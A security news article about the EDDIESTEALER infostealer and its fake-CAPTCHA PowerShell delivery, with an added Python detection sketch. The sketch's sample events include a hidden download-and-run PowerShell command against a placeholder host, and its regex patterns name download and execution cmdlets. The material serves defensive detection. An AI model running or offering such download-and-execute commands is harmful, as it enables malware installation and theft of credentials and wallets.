
This CAPTCHA Might Drain Your Entire Crypto Wallet
A fake CAPTCHA could potentially drain your crypto wallet[...]
Rust-Based 'EDDIESTEALER' Malware Targets Crypto Users' Data
Cybersecurity firm Elastic Security Labs has identified a new "infostealer" malware called EDDIESTEALER, designed to steal sensitive personal data including passwords, browser information, and system credentials. What makes this threat particularly concerning is its use of the Rust programming language, which adds complexity to detection and analysis.
The attackers use a clever social engineering tactic: fake CAPTCHA verification pages on malicious websites. These pages trick users into pasting a PowerShell command that secretly downloads and executes the EDDIESTEALER binary. The malware then decrypts its core components, establishes communication with command-and-control servers, and begins scanning for cryptocurrency-related files.
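The delivery step described above leaves a recognizable process-creation trace on the endpoint. The following detection sketch is an added example, not code from Elastic Security Labs or from the malware. The event field names, the `explorer.exe` parent heuristic, and the sample events are assumptions constructed for illustration.

```python
import re

# Heuristics below are assumptions for this example, not published vendor rules.
SHELLS = {"powershell.exe", "pwsh.exe"}
PASTE_PARENTS = {"explorer.exe"}  # assumed parent when a user pastes a command into a run prompt
HIDDEN = re.compile(r"(?<![\w-])-w[a-z]*\s+(?:h[a-z]*|1)\b", re.I)
DOWNLOAD = re.compile(r"\b(invoke-webrequest|iwr|invoke-restmethod|irm|"
                      r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
EXECUTE = re.compile(r"\b(invoke-expression|iex|start-process|cscript|wscript)\b", re.I)

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def assess(event):
    """Return the signals that make a process-creation event look like a pasted download-and-run command."""
    if basename(event["image"]) not in SHELLS:
        return []
    cmd, signals = event["command_line"], []
    if basename(event["parent_image"]) in PASTE_PARENTS:
        signals.append("interactive_parent")
    if HIDDEN.search(cmd):
        signals.append("hidden_window")
    if DOWNLOAD.search(cmd):
        signals.append("download")
    if EXECUTE.search(cmd):
        signals.append("execute")
    return signals

def is_suspicious(event):
    """Require download and execution in one command, plus at least one context signal."""
    signals = assess(event)
    return {"download", "execute"} <= set(signals) and len(signals) >= 3

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample events (not real telemetry); example.invalid is a placeholder host.
EVENTS = [
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r'powershell -w hidden -c "iwr https://example.invalid/a -OutFile $env:TEMP\a.exe; Start-Process $env:TEMP\a.exe"'},
    {"parent_image": r"C:\Windows\System32\svchost.exe", "image": PS,
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r"powershell Invoke-WebRequest https://example.invalid/tool.zip -OutFile tool.zip"},
]

if __name__ == "__main__":
    for e in EVENTS:
        print(is_suspicious(e), assess(e))
```

Only the first event is flagged; the scheduled script and the plain download lack the combined download-and-execute pattern.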
EDDIESTEALER specifically targets crypto wallet data, searching for configuration files, JSON keystores, and other sensitive information that could give attackers access to private keys and seed phrases. This puts victims' cryptocurrency holdings at serious risk of theft.
Even more concerning, the malware can bypass encryption protections in Chromium-based browsers using the ChromeKatz tool, which extracts sensitive data directly from browser memory. This allows attackers to access encrypted passwords and session tokens that would normally be protected.
After completing its data theft, EDDIESTEALER attempts to erase itself from the infected system, making forensic investigation more difficult for security teams.